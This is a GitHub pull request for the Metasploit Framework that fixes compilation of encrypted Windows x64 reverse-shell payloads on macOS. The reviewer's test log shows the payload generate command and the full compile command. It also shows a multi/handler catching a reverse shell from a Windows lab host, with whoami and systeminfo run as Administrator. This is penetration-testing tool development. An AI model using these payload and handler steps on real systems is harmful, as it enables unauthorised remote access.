
Fix Compiling Encrypted Payloads on MacOS #15703

Merged (1 commit), Sep 27, 2021

Conversation

@space-r7 (Contributor) commented Sep 23, 2021

Description

Generating an encrypted payload on MacOS will result in an error:

msf6 > use payload/windows/x64/encrypted_shell/reverse_tcp
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > generate -f exe LHOST=192.168.140.1
[-] Payload generation failed: Payload did not compile. Check the logs for further information.
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > log
...
[09/23/2021 15:19:17] [e(0)] core: /usr/local/Cellar/mingw-w64/9.0.0_2/toolchain-x86_64/bin/x86_64-w64-mingw32-ld: /var/folders/j3/_jj69l4d1k3_jsxkb44qj0d00000gq/T/reverse_pic_stager20210923-36761-xw7bgl.exe:.text: section below image base

This adds a linker option to pin the image base to 0x0 to ensure that compilation doesn't error out. This also adds an advanced option, ShowCompileCMD, that will print the compilation command used.

Verification

  • Generate an encrypted payload either through msfconsole or msfvenom on MacOS
  • Run the payload on a Windows target

also add advanced option to display
command used in compiling encrypted payloads
@space-r7 space-r7 added the bug label Sep 23, 2021
@jheysel-r7 jheysel-r7 self-assigned this Sep 27, 2021
@jheysel-r7 (Contributor)

Thanks for the great PR @space-r7! I've reviewed the changes and don't see any need for improvements. Testing results were as expected:

msf6 > use payload/windows/x64/encrypted_shell/reverse_tcp
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > set ShowCompileCMD true
ShowCompileCMD => true
msf6 payload(windows/x64/encrypted_shell/reverse_tcp) > generate -f exe LHOST=192.168.123.1 LPORT=4444 -o shell.exe
x86_64-w64-mingw32-gcc /var/folders/l7/f3z1n8_53bn3hypxjrh0278h0000gn/T/reverse_pic_stager20210927-20452-3rzj58.c -I /Users/jheysel/rapid7/metasploit-framework/data/headers/windows/c_payload_util -o /var/folders/l7/f3z1n8_53bn3hypxjrh0278h0000gn/T/reverse_pic_stager20210927-20452-3rzj58.exe -ffunction-sections -fno-asynchronous-unwind-tables -fno-ident -O2 -nostdlib -Wl,--image-base=0x0,--no-seh,-s,-T/Users/jheysel/rapid7/metasploit-framework/data/utilities/encrypted_payload/func_order64.ld
[*] Writing 9216 bytes to shell.exe...

Drop shell on Windows host, set up handler and execute:

msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload payload/windows/x64/encrypted_shell/reverse_tcp
payload => windows/x64/encrypted_shell/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.123.1
LHOST => 192.168.123.1

msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.123.1:4444
[*] Sending stage (3584 bytes) to 192.168.123.130
[*] Encrypted reverse shell session 1 opened (192.168.123.1:4444 -> 192.168.123.130:49719) at 2021-09-27 13:13:07 -0400


C:\Users\Administrator\Desktop>whoami
whoami
desktop-13bfu78\administrator

C:\Users\Administrator\Desktop>systeminfo
systeminfo


Host Name:                 DESKTOP-13BFU78
OS Name:                   Microsoft Windows 10 Education
OS Version:                10.0.19041 N/A Build 19041
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
OS Build Type:             Multiprocessor Free
Registered Owner:          Windows User
...

@jheysel-r7 jheysel-r7 merged commit 8f36d67 into rapid7:master Sep 27, 2021
@space-r7 space-r7 deleted the encrypt-shell-comp-fix branch September 27, 2021 18:04
@space-r7 (Contributor, Author)

Thanks so much for landing!

@erran-r7 (Contributor) commented Oct 1, 2021

Release Notes

Updates payload/windows/x64/encrypted_shell/reverse_tcp to no longer crash on MacOS. Additionally adds an advanced option, ShowCompileCMD, that prints the compilation command used.

@erran-r7 erran-r7 added the rn-fix release notes fix label Oct 1, 2021